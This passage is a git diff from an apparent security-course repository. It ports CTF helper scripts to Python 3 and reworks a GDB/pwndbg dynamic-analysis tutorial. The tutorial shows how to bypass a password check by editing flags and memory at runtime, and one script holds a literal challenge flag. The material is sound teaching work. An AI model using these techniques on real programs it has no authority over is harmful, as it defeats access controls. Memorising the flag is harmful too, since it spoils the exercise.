diff --git a/COPYING.md b/COPYING.md index 9778f06..1e1577f 100644 --- a/COPYING.md +++ b/COPYING.md @@ -7,7 +7,7 @@ A copy of each license is below. Copy of CC BY-SA 4.0: -``` +```text Attribution-NonCommercial-ShareAlike 4.0 International ======================================================================= @@ -449,7 +449,7 @@ Creative Commons may be contacted at creativecommons.org. Copy of BSD-3-Clause: -``` +```text Copyright 2021 University POLITEHNICA of Bucharest Redistribution and use in source and binary forms, with or without diff --git a/chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py b/chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py index dc4fe0f..efd1960 100644 --- a/chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py +++ b/chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py @@ -3,10 +3,10 @@ f = open("../flag") flag = f.readline().strip() f.close() -char = '\n' +char = "\n" res = [] for i in range(0, len(flag)): res += [ord(flag[i]) - ord(char)] -print "{" + ", ".join("{}".format(r) for r in res) + "};" +print("{" + ", ".join("{}".format(r) for r in res) + "};") diff --git a/chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py b/chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py index 3251650..319634d 100644 --- a/chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py +++ b/chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py @@ -1,29 +1,30 @@ from pwn import * flag = "SSS_CTF{0bad3910f14d10569b8bfe11aa1081e970e72e}\x00" -flag = ''.join(chr((ord(x) - 13) & 0xff) for x in flag) +flag = "".join(chr((ord(x) - 13) & 0xFF) for x in flag) parts = unpack_many(flag, 32) for i in range(len(parts)): - print('strvec[%d] = 0x%x;' % (i, parts[i])) + print("strvec[%d] = 0x%x;" % (i, parts[i])) def encrypt(data): - res = map(ord, data) - n = len(data) - print(hexdump(data)) - for i in range(n / 2): - res[i] = res[i] ^ res[n - i - 1] - res[n - i - 1] = (res[n - i - 1] - 1) & 0xff - return ''.join(map(chr, res)) + res = map(ord, data) + n = len(data) + print(hexdump(data)) + for i in range(n / 2): + res[i] = res[i] ^ res[n - i - 1] + res[n - i - 1] = (res[n - i - 1] - 1) & 0xFF + return "".join(map(chr, res)) + binary = ELF("./phone_home") -context.arch = 'i386' +context.arch = "i386" func_ea = binary.symbols["gen_flag"] chunk = binary.read(func_ea, 4096) -func_sz = chunk.find(asm('ret')) + 1 -print('Function size: 0x%x' % func_sz) +func_sz = chunk.find(asm("ret")) + 1 +print("Function size: 0x%x" % func_sz) func = encrypt(chunk[:func_sz]) binary.write(func_ea, func) diff --git a/chapters/binary-analysis/dynamic-analysis/reading/README.md b/chapters/binary-analysis/dynamic-analysis/reading/README.md index a70312c..6d44edd 100644 --- a/chapters/binary-analysis/dynamic-analysis/reading/README.md +++ b/chapters/binary-analysis/dynamic-analysis/reading/README.md @@ -1,985 +1,944 @@ ---- -linkTitle: Dynamic Analysis -type: docs -weight: 10 ---- - -# Dynamic Analysis - -## Introduction - -#### Objectives & Rationale - -The first part of this session will give you a walkthrough of the most common GDB principles that we are going to use in exploitation. In the second half, we are going to use these concepts in practice, to evade a basic key evaluation program. - -Black Box type analysis works best when standard algorithms are used in the program, such as: MD5, SHA1,RSA . We can change the input to a more suggestive one and use the output to estimate what function was used to convert it. - -Combined with behavioral analysis methods such as using sandboxes or strace/ltrace we can quickly map sections of code to functionalities. - -With dynamic analysis, packed malware can be extracted from memory in unpacked form, enabling us to continue static analysis on the complete binary. - -#### Prerequisites - -In the current session we will use GDB extensively. We assume that you are familiar with its basic usage and will move on quickly to some of its more advanced features. - -To brush up on the GDB basics, read this [Refresher](https://security.cs.pub.ro/summer-school/wiki/session/04-gdb "session:04-gdb"). - -The executable used in the demo is called sppb and is the challenge 1 binary. - -###### Before GDB - -##### One thing you should always do before firing up GDB is to try to learn all the available information on the executable you\'re trying to debug through the techniques that have been presented so far. - -For the purposes of this session it is a good idea to always run`objdump` on all the executable files before attaching GDB to them so that you have a better idea of what goes where. - -``` {.code .bash} -$ objdump -M intel -d [executable] -``` - -### GDB Basic Commands - -#### Getting help with GDB - -Whenever you want to find out more information about GDB commands feel free to search for it inside [the documentation](http://www.gnu.org/software/gdb/documentation/ "http://www.gnu.org/software/gdb/documentation/") or by using the `help` command followed by your area of interest. For example searching for help for the `disassemble` command can be obtained by running the following command in GDB: - -``` {.code .bash} -#print info about all help areas available -#identify the area of your question -(gdb) help -#print info about available data commands -#identify the command you want to learn more about -(gdb) help data -#print info about a specific command -#find out more about the command you are searching for -(gdb) help disassemble -``` - -#### Opening a program with GDB - - -A program can be opened for debugging in a number of ways. We can run -GDB directly attaching it to a program: - -``` {.code .bash} -$ gdb [executable-file] -``` - -Or we can open up GDB and then specify the program we are trying to -attach to using the file or file-exec command: - -``` {.code .bash} -$ gdb -(gdb) file [executable-file] -``` - -Furthermore we can attach GDB to a running service if we know its -process id: - -``` {.code .bash} -$ gdb --pid [pid_number] -``` - - -#### Disassembling - - -GDB allows disassembling of binary code using the `disassemble` command -(it may be shortened to `disas`). The command can be issued either on a -memory address or using labels. - -``` {.code .bash} -(gdb) disassemble *main -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 -....Output ommited..... -(gdb) disassemble 0x080491c9 -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 -``` - - -#### Adding Breakpoints - - -Breakpoints are important to suspend the execution of the program being debugged in a certain place. Adding breakpoints is done with the `break` -command. A good idea is to place a breakpoint at the main function of the program you are trying to exploit. Given the fact that you have already run `objdump` and disassembled the program you know the address for the start of the main function. This means that we can set a -breakpoint for the start of our program in two ways: - -``` {.code .bash} -(gdb) break *main (when the binary is not stripped of symbols) -(gdb) break *0x[main_address_obtained_with_objdump] (when aslr is off) -``` - -The general format for setting breakpoints in GDB is as follows: - -``` {.code .bash} -(gdb) break [LOCATION] [thread THREADNUM] [if CONDITION] -``` - -*Issuing the `break` command with no parameters will place a breakpoint* *at the current address.* - -*GDB allows using abbreviated forms for all the commands it supports. Learning these abbreviations comes with time and will greatly improve you work output. Always be on the lookout for using abbreviated commands.* - -The abbreviated command for setting breakpoints is simply `b`. - -#### Listing Breakpoints - - -At any given time all the breakpoints in the program can be displayed using the `info breakpoints` command: - -``` {.code .bash} -(gdb) info breakpoints -``` - -*You can also issue the abbreviated form of the command* - -``` {.code .bash} -(gdb) i b -``` - -#### Deleting Breakpoints - -Breakpoints can be removed by issuing the `delete breakpoints` command followed by the breakpoints number, as it is listed in the output of the -`info breakpoints` command. - -``` {.code .bash} -(gdb) delete breakpoints [breakpoint_number] -``` - -*You can also delete all active breakpoints by issuing the following the* `delete breakpoints` command with no parameters:* - -``` {.code .bash} -(gdb) delete breakpoints -``` - -Once a breakpoint is set you would normally want to launch the program into execution. You can do this by issuing the `run` command. The program will start executing and stop at the first breakpoint you have -set. - -``` {.code .bash} -(gdb) run -``` - -#### Execution flow - -Execution flow can be controlled in GDB using the `continue`, `stepi`,`nexti` as follows: - -``` {.code .bash} -(gdb) help continue -#Continue program being debugged, after signal or breakpoint. -#If proceeding from breakpoint, a number N may be used as an argument, -#which means to set the ignore count of that breakpoint to N - 1 (so that -#the breakpoint won't break until the Nth time it is reached). -(gdb) help stepi -#Step one instruction exactly. -#Argument N means do this N times (or till program stops for another reason). -(gdb) help nexti -#Step one instruction, but proceed through subroutine calls. -#Argument N means do this N times (or till program stops for another reason). -``` - -*You can also use the abbreviated format of the commands: `c`* -*(`continue`), `si` (`stepi`), `ni` (`nexti`).* - -*If at any point you want to start the program execution from the* *beginning you can always reissue the `run` command.* - -Another technique that can be used for setting breakpoints is using offsets. - -As you already know, each assembly instruction takes a certain number of bytes inside the executable file. This means that whenever you are setting breakpoints using offsets you must always set them at instruction boundaries. - -``` {.code .bash} -(gdb) break *main -Breakpoint 1 at 0x80491d0 -(gdb) run -Starting program: sppb - -Breakpoint 1, 0x80491d0 in main () -(gdb) disassemble main -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -.....Output ommited..... -(gdb) break *main+4 -Breakpoint 2 at 0x80491cd -``` - - -### Examine and Print, your most powerful tools - - -GDB allows examining of memory locations be them specified as addresses or stored in registers. The `x` command (for *examine*) is arguably one -of the most powerful tool in your arsenal and the most common command you are going to run when exploiting. - -The format for the `examine` command is as follows: - -``` {.code .bash} -(gdb) x/nfu [address] - n: How many units to print - f: Format character - a Pointer - c Read as integer, print as character - d Integer, signed decimal - f Floating point number - o Integer, print as octal - s Treat as C string (read all successive memory addresses until null character and print as characters) - t Integer, print as binary (t="two") - u Integer, unsigned decimal - x Integer, print as hexadecimal - u: Unit - b: Byte - h: Half-word (2 bytes) - w: Word (4 bytes) - g: Giant word (8 bytes) - i: Instruction (read n assembly instructions from the specified memory address) -``` - -In contrast with the examine command, which reads data at a memory location the `print` command (shorthand `p`) prints out values stored in -registers and variables. - -The format for the `print` command is as follows: - -``` {.code .bash} -(gdb) p/f [what] - f: Format character - a Pointer - c Read as integer, print as character - d Integer, signed decimal - f Floating point number - o Integer, print as octal - s Treat as C string (read all successive memory addresses until null character and print as characters) - t Integer, print as binary (t="two") - u Integer, unsigned decimal - x Integer, print as hexadecimal - i Instruction (read n assembly instructions from the specified memory address) -``` - -For a better explanation please follow through with the following example: - -``` {.code .bash} -#a breakpoint has been set inside the program and the program has been run with the appropriate commands to reach the breakpoint -#at this point we want to see which are the following 10 instructions -(gdb) x/10i 0x80491cd - 0x80491cd : sub esp,0x4 - 0x80491d0 : mov eax,ds:0x804c030 - 0x80491d5 : push 0x0 - 0x80491d7 : push 0x1 - 0x80491d9 : push 0x0 - 0x80491db : push eax - 0x80491dc : call 0x8049080 -#let's examine the memory at 0x804a02a because we have a hint that this address holds one of the parameters of the scanf call as it is afterwards placed on the stack (we'll explain later how we have reached this conclusion) -#the other parameter will be an address where the input will be stored -(gdb) x/s 0x804a02a -0x804a02a: "%d" -# we now set a breakpoint for *main+56 -(gdb) break *0x08049201 -Breakpoint 3 at 0x08049201 -(gdb) continue -Continuing. - -Breakpoint 3, 0x08049201 in main () -We then record the value of the eax register somewhere and use nexti(ni) and then we input an integer. -#let's examine the address which we recorded earlier corresponding to the eax register (it should've held the address for the integer we input) -#take note that in GDB registers are preceded by the "$" character very much like variables -(gdb) x/d 0xffffcf70 <- (your address) -0xffffcf70: -#now let's print the contents of the eax register as hexadecimal -(gdb) p/x $eax -$1 = - -The diference between p and x can be observed by issuing the following commands: -x/s 0x804a030 -0x804a030: "Your password is: %d. Evaluating it...\n" - -p /s 0x804a030 - -$2 = 1920298841 which is the number in decimal format that "Your" can be translated to by its ascii codes (little endian so written as 0x72756F59). - -In order to see the same result we must use the command p /s (char*)0x804a030 and dereference the pointer ourselves -# as you can see the address holds the memory for the beginning of the string -# this shows you how "x" interprets data from memory while "p" merely prints out the contents in the required format -# you can think of it as "x" dereferencing while "p" not dereferencing -``` - - -### GDB command file - - - -When exploiting, there are a couple of commands that you will issue periodically and doing that by hand will get cumbersome. GDB commands -files will allow you to run a specific set of commands automatically after each command you issue manually. This comes in especially handy -when you\'re stepping through a program and want to see what happens with the registers and stack after each instruction is ran, which is the -main target when exploiting. - -The examine command only has sense when code is already running on the machine so inside the file we are going to use the display command which -translates to the same output. - -In order to use this option you must first create your commands file. This file can include any GDB commands you like but a good start would -be printing out the content of all the register values, the next ten instructions that are going to be executed, and some portion from the -top of the stack. - -The reason for examining all of the above after each instruction is ran will become more clear once the we go through the second section of the -session. - -Command file template: - -``` {.code .bash} -display/10i $eip -display/x $eax -display/x $ebx -display/x $ecx -display/x $edx -display/x $edi -display/x $esi -display/x $ebp -display/32xw $esp -``` - -In order to view all register values you could use the `x` command. -However the values of all registers can be obtained by running the`info all-registers` command: - -``` {.code .bash} -(gdb) info all-registers -eax 0x8048630,134514224 -ecx 0xbffff404,-1073744892 -edx 0xbffff394,-1073745004 -ebx 0xb7fc6ff4,-1208193036 -esp 0xbffff330,0xbffff330 -ebp 0xbffff368,0xbffff368 -esi 0x0,0 -edi 0x0,0 -eip 0x80484e9,0x80484e9 -eflags 0x286,[ PF SF IF ] -cs 0x73,115 -ss 0x7b,123 -ds 0x7b,123 -es 0x7b,123 -fs 0x0,0 -gs 0x33,51 -st0 *value not available* -st1 *value not available* -st2 *value not available* -st3 *value not available* -st4 *value not available* -st5 *value not available* -st6 *value not available* -st7 *value not available* -fctrl 0x37f,895 -fstat 0x0,0 -ftag 0xffff,65535 -fiseg 0x0,0 -fioff 0x0,0 -foseg 0x0,0 ----Type to continue, or q to quit--- -fooff 0x0,0 -fop 0x0,0 -mxcsr 0x1f80,[ IM DM ZM OM UM PM ] -ymm0 *value not available* -ymm1 *value not available* -ymm2 *value not available* -ymm3 *value not available* -ymm4 *value not available* -ymm5 *value not available* -ymm6 *value not available* -ymm7 *value not available* -mm0 *value not available* -mm1 *value not available* -mm2 *value not available* -mm3 *value not available* -mm4 *value not available* -mm5 *value not available* -mm6 *value not available* -mm7 *value not available* -``` - -*One thing you might notice while using GDB is that addresses seem to be pretty similar between runs. Although with experience you will gain a better feel for where an address points to, one thing to remember at this point would be that stack addresses usually have the `0xbffff….` format. In order to run GDB with the commands file you have just generated, when launching GDB specify the `-x [command_file]` parameter.* - -### Using GDB to modify variables - -GDB can be used to modify variables during runtime. In the case of exploitation this comes in handy as the program can be altered at -runtime with the purpose of changing the execution path to desired branches. - -### PWNDBG - - -As you can see using GDB can be cumbersome, this is why we recommend using the pwndbg plug-in. The tutorial as well as the repository of the project can be found here [Pwndbg](https://github.com/pwndbg/pwndbg "https://github.com/pwndbg/pwndbg") - -Give the fact that pwndbg is just a wrapper, all the functionality of GDB will be available when running gdb with the`pwndbg` plug-in. Some of the advantages of using pwngdb include: - -1. Automatic preview of registers, code and stack after each instruction (you no longer need to create your own commands file) -2. Automatic dereferencing and following through of memory locations -3. Color coding - -An alternative to pwndbg is [Gef](https://github.com/hugsy/gef "https://github.com/hugsy/gef"). However, this tutorial is designed with Pwndbg in mind. - -#### PWNDBG Commands - -`pdis` command gives a pretty output that is similar to what the `disas` -command in GDB prints: - -``` {.code .bash} -Usage: pdis 0x80491d0 -``` - -If `pdis` is used with an address as a parameter, the output will be similar to what `x/Ni` prints out (where N is the number of instructions you want to disassemble) Usage: -pdis \[address\] [N] - where N is the number of instructions you want to be printed - -The `stepi` command has the same effect as in GDB however, if you are running PWNDBG you will notice that after each step PWNDBG will automatically print register values, several lines of code from eip -register and a portion of the stack: - -``` {.code .bash} -pwndbg> stepi - -LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA -────────────────────────────────────[ REGISTERS ]──────────────────────────────────── -*EAX 0xf7facd20 (_IO_2_1_stdout_) ◂— 0xfbad2084 - EBX 0x0 - ECX 0xa00af61b - EDX 0xffffcfb4 ◂— 0x0 - EDI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c - ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c - EBP 0xffffcf78 ◂— 0x0 - ESP 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -*EIP 0x80491d5 (main+12) ◂— push 0 /* 'j' */ -─────────────────────────────────────[ DISASM ]────────────────────────────────────── - 0x80491d0 mov eax, dword ptr [stdout@GLIBC_2.0] <0x804c030> - ► 0x80491d5 push 0 - 0x80491d7 push 1 - 0x80491d9 push 0 - 0x80491db push eax - 0x80491dc call setvbuf@plt - - 0x80491e1 add esp, 0x10 - 0x80491e4 mov dword ptr [ebp - 8], 0 - 0x80491eb push 0x804a010 - 0x80491f0 call puts@plt - - 0x80491f5 add esp, 4 -──────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────── -In file: /home/kali/Desktop/dokermaker/binary-internal/sessions/05-dynamic-analysis/activities/01-02-challenge-sppb/src/sppb.c - 6 execve("/bin/sh", 0, 0); - 7 } - 8 - 9 int main() - 10 { - ► 11 setvbuf(stdout, NULL, _IOLBF, 0); - 12 int readValue = 0; - 13 - 14 printf("Please provide password: \n"); - 15 scanf("%d", &readValue); - 16 -──────────────────────────────────────[ STACK ]────────────────────────────────────── -00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -────────────────────────────────────[ BACKTRACE ]──────────────────────────────────── - ► f 0 0x80491d5 main+12 - f 1 0xf7de0fd6 __libc_start_main+262 - -``` - - -You can always use the following commands to obtain context at any given -moment inside the debug process: - -1. `context reg` -2. `context code` -3. `context stack` -4. `context all` - -One additional PWNDBG command which can be used to show values in registers is the `telescope` command. The command dereferentiates pointer values until it gets to a value and prints out the entire trace. - -The command can be used with both registers and memory addresses: - -``` {.code .bash} -pwndbg$ telescope $esp -00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -pwndbg> telescope 0xffffcf84 -00:0000│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -01:0004│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -02:0008│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -03:000c│ 0xffffcf90 —▸ 0xffffcfc4 ◂— 0xe38ae80b -04:0010│ 0xffffcf94 —▸ 0xf7ffdb60 —▸ 0xf7ffdb00 —▸ 0xf7fc93e0 —▸ 0xf7ffd9a0 ◂— ... -05:0014│ 0xffffcf98 —▸ 0xf7fc9410 —▸ 0x804832d ◂— 'GLIBC_2.0' -06:0018│ 0xffffcf9c —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -07:001c│ 0xffffcfa0 ◂— 0x1 -``` - -In the example above, the memory address 0x8048630 was loaded into EAX. That is why examining the register or the memory location gives the same output. - -For more information on various PWNdbg commands you can always visit the PWNdbg help through the `pwndbg` command It is always a better idea to use PWNdbg commands when available. However you should also know the basics of using GDB as well. - - -#### Altering variables and memory with PWNdbg and GDB - - -In addition to basic registers, GDB has a two extra variables which map onto some of the existing registers, as follows: - -- `$pc – $eip` - -- `$sp – $esp` - -- `$fp – $ebp` - -In addition to these there are also two registers which can be used to view the processor state `$ps – processor status` - -Values of memory addresses and registers can be altered at execution time. Because altering memory is a lot easier using PWNdbg we are going to -use it throughout today\'s session. - -The easiest way of altering the execution flow of a program is editing the `$eflags` register just before jump instructions. - -Using GDB the `$eflags` register can be easily modified: - -``` {.code .bash} -pwndbg> reg eflags -EFLAGS 0x282 [ cf pf af zf SF IF df of ] -Set the ZF flag -pwndbg> set $eflags |= (1 << 6) -Clear the ZF flag -pwndbg> set $eflags &= ~(1 << 6) -``` - - -Notice that the flags that are set are printed in all-caps when the`reg eflags` command is issued. - -The `set` command (GDB native) can be used to modify values that reside inside memory. - -``` {.code .bash} -pwndbg> telescope 0x804a010 -00:0000│ 0x804a010 ◂— 'Please provide password: ' -01:0004│ 0x804a014 ◂— 'se provide password: ' -02:0008│ 0x804a018 ◂— 'rovide password: ' -03:000c│ 0x804a01c ◂— 'de password: ' -04:0010│ 0x804a020 ◂— 'assword: ' -05:0014│ 0x804a024 ◂— 'ord: ' -06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ -07:001c│ 0x804a02c ◂— 0x0 - -pwndbg> set {char [14]} 0x804a010 = "No pass here" -Written 28 bytes to 0x8048630 -pwndbg> telescope 0x8048630 -00:0000│ 0x804a010 ◂— 'No pass here' -01:0004│ 0x804a014 ◂— 'ass here' -02:0008│ 0x804a018 ◂— 'here' -03:000c│ 0x804a01c ◂— 0x70200000 -04:0010│ 0x804a020 ◂— 'assword: ' -05:0014│ 0x804a024 ◂— 'ord: ' -06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ -07:001c│ 0x804a02c ◂— 0x0 -``` - -As you can see the string residing in memory at address `0x8048630` has been modified using the `set` command. - -Pwngdb does not offer enhancements in modifying registry values. For modifying registry values you can use the GDB `set` command. - -``` {.code} -pwngdb> p/x $eax -$10 = 0x1 -pwngdb> set $eax=0x80 -pwngdb> p/x $eax -$11 = 0x80 -``` - - -### Enough with GDB (for a while) - - -The following section will describe the process of function calling in detail. Understanding function calling and stack operations during program execution is esential to exploitation. - -### The Stack - -The stack is one of the areas of memory which gets the biggest attention in exploitation writing. - - -#### Stack Growth - - -The stack grows from high memory addresses to low memory addresses. - -``` {.code .bash} -pwndbg> pdis $eip - - 0x80491db push eax - 0x80491dc call setvbuf@plt - - 0x80491e1 add esp, 0x10 - 0x80491e4 mov dword ptr [ebp - 8], 0 - 0x80491eb push 0x804a010 - ► 0x80491f0 call puts@plt - -pwndbg> p/x $esp -$1 = 0xffffcf6c -pwndbg> si -0x8049050 in puts@plt () -pwndbg> p/x $esp -$5 = 0xffffcf68 -``` - -As you can see from the example above the \$esp register had an initial value of `0xffffcf6c`. The next instruction that is about to be executed is a push (it pushes `0x0` on the stack). We execute the instruction and then reevaluate the value of `$esp`. As we can see `$esp` now points to `0xffffcf68` (`0xffffcf6c-0x4`). - - -#### Frame pointers and local function variables - - -Whenever the processor is entering the execution for a function, a special logical container is created on the stack for that function. - -This container is called a function frame. The idea behind it is that the processor must know which area of the stack belongs to which function. - -In order to achieve this logical segmentation a set of 2 instructions are automatically inserted by the compiler at the beginning of each function. Can you tell what they are based on the output below? - -``` {.code .bash} -pwndbg> break main -Breakpoint 1 at 0x80484c8 -pwndbg> run -[----------------------------------registers-----------------------------------] - EAX 0xf7fa99e8 (environ) —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' - EBX 0x0 - ECX 0xb8a6a751 - EDX 0xffffcfb4 ◂— 0x0 - EDI 0x80490a0 (_start) ◂— xor ebp, ebp - ESI 0x1 - EBP 0xffffcf78 ◂— 0x0 - ESP 0xffffcf70 ◂— 0x1 - EIP 0x80491d0 (main+7) ◂— mov eax, dword ptr [0x804c030] -[-------------------------------------code-------------------------------------] - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 - 0x080491d5 <+12>: push 0x0 - 0x080491d7 <+14>: push 0x1 - 0x080491d9 <+16>: push 0x0 - 0x080491db <+18>: push eax - -[------------------------------------stack-------------------------------------] -00:0000│ esp 0xffffcf70 ◂— 0x1 -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7dda905 (__libc_start_main+229) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 - -[------------------------------------------------------------------------------] -Legend: code, data, rodata, value - -Breakpoint 1, 0x080491d0 in main () -pwndbg> disass password_accepted - - - 0x080491b2 <+0>: push ebp - 0x080491b3 <+1>: mov ebp,esp - 0x080491b5 <+3>: push 0x0 - 0x080491b7 <+5>: push 0x0 - 0x080491b9 <+7>: push 0x804a008 - 0x080491be <+12>: call 0x8049070 - 0x080491c3 <+17>: add esp,0xc - 0x080491c6 <+20>: nop - 0x080491c7 <+21>: leave - 0x080491c8 <+22>: ret - -``` - -What we did is we created a breakpoint for the start of the main function and then ran the program. As you can see the first 2 instructions that got executed were `push ebp` and `mov ebp,esp`. - -We then set a breakpoint for another function called `pass_accepted`, continued execution and entered a password that we know is going to pass validation. Once the breakpoint is hit, we can see the same 2 instructions `push ebp` and `mov ebp,esp`. - -The two instructions which can be noticed at the beginning of any function are the instructions required for creating the logical container for each function on the stack. - -In essence what they do is save the reference of the old container (`push ebp`) and record the current address at the top of the stack as the beginning of the new container(`mov ebp,esp`). - -For a visual explanation please see below: - -

- Sublime's custom image -

- -As you can see the EBP register always points to the stack address that corresponds to the beginning of the current function\'s frame. That is why it is most often referred to as the frame pointer. - -In addition to the two instructions required for creating a new stack frame for a function, there are a couple more instructions that you will usually see at the beginning of a function - -If you analyze the instructions at the beginning of main, you can spot these as being: - -1. An `and esp,0xfffffff0` instruction. - -2. A `sub` insctruction that subtracts a hex value from ESP. - -The first of the two instructions has the purpose of aligning the stack to a specific address boundary. This is done to increase processor efficiency. In our specific case, the top of the stack gets aligned to a 16 byte multiple address. - -One of the purposes of the stack inside functions is that of offering address space in which to place local variables. The second instruction preallocates space for local function variables. - -Let\'s see how local variables are handled inside assembly code. - -``` {.code .c} -#include -int main() -{ - int a; - a=1; - return 0; -} -``` - -``` {.code .bash} -kali@kali:~/sss$ gdb test -GNU gdb (Ubuntu/Linaro 7.4-2012.02-0ubuntu2) 7.4-2012.02 -Copyright (C) 2012 Free Software Foundation, Inc. -License GPLv3+: GNU GPL version 3 or later -This is free software: you are free to change and redistribute it. -There is NO WARRANTY, to the extent permitted by law. Type "show copying" -and "show warranty" for details. -This GDB was configured as "i686-linux-gnu". -For bug reporting instructions, please see: -... -Reading symbols from /home/dgioga/sss/test...(no debugging symbols found)...done. -pwndbg> break main -Breakpoint 1 at 0x80483ba -pwndbg> run -[----------------------------------registers-----------------------------------] -EAX: 0x1 -EBX: 0xb7fc6ff4 --> 0x1a0d7c -ECX: 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") -EDX: 0xbffff3a4 --> 0xb7fc6ff4 --> 0x1a0d7c -ESI: 0x0 -EDI: 0x0 -EBP: 0xbffff378 --> 0x0 -ESP: 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) -EIP: 0x80483ba (:,mov DWORD PTR [ebp-0x4],0x1) -EFLAGS: 0x200282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) -[-------------------------------------code-------------------------------------] - 0x80483b4
:, push ebp - 0x80483b5 :,mov ebp,esp - 0x80483b7 :,sub esp,0x10 -=> 0x80483ba :,mov DWORD PTR [ebp-0x4],0x1 - 0x80483c1 :,mov eax,0x0 - 0x80483c6 :,leave - 0x80483c7 :,ret - 0x80483c8:,nop -[------------------------------------stack-------------------------------------] -0000| 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) -0004| 0xbffff36c --> 0xb7fc6ff4 --> 0x1a0d7c -0008| 0xbffff370 --> 0x80483d0 (<__libc_csu_init>:,push ebp) -0012| 0xbffff374 --> 0x0 -0016| 0xbffff378 --> 0x0 -0020| 0xbffff37c --> 0xb7e3f4d3 (<__libc_start_main+243>:,mov DWORD PTR [esp],eax) -0024| 0xbffff380 --> 0x1 -0028| 0xbffff384 --> 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") -[------------------------------------------------------------------------------] -Legend: code, data, rodata, value - -Breakpoint 1, 0x080483ba in main () -``` - -As you can see the operations that relate to the stack are: - -1. The old frame pointer is saved. - -2. EBP takes the value of ESP (the frame pointer is set to point to the current function\'s frame). - -3. `0x10` is subtracted from ESP (reserve space for local variables). - -4. The value `0x01` is placed at the address of EBP-0x4 (the local - variable `a` takes the value 1). - -#### Function parameters - - -The stack is also used to pass in parameters to functions. - -In the process of calling a function we can define two entities. The callee (the function that gets called) and the caller (the function that calls). - -When a function is called, the caller pushes the parameters for the callee on the stack. The parameters are pushed in reverse order. - -When the callee wants to get access to the parameters it was called with, all it needs to do is access the area of the stack that is higher up in reference to the start of it\'s frame. - -At this point it makes sense to remember the following cases: - -1. When EBP+value is referred to it is generally a referral to a parameter passed in to the current function. - -2. When EBP-value is referred to it is generally a referral to a local variable. - -Lets see how this happens with the following code: - -``` {.code .c} -#include - -int add(int a, int b) -{ - int c; - c=a+b; - return c; -} - -int main() -{ - add(10,3); - return 0; 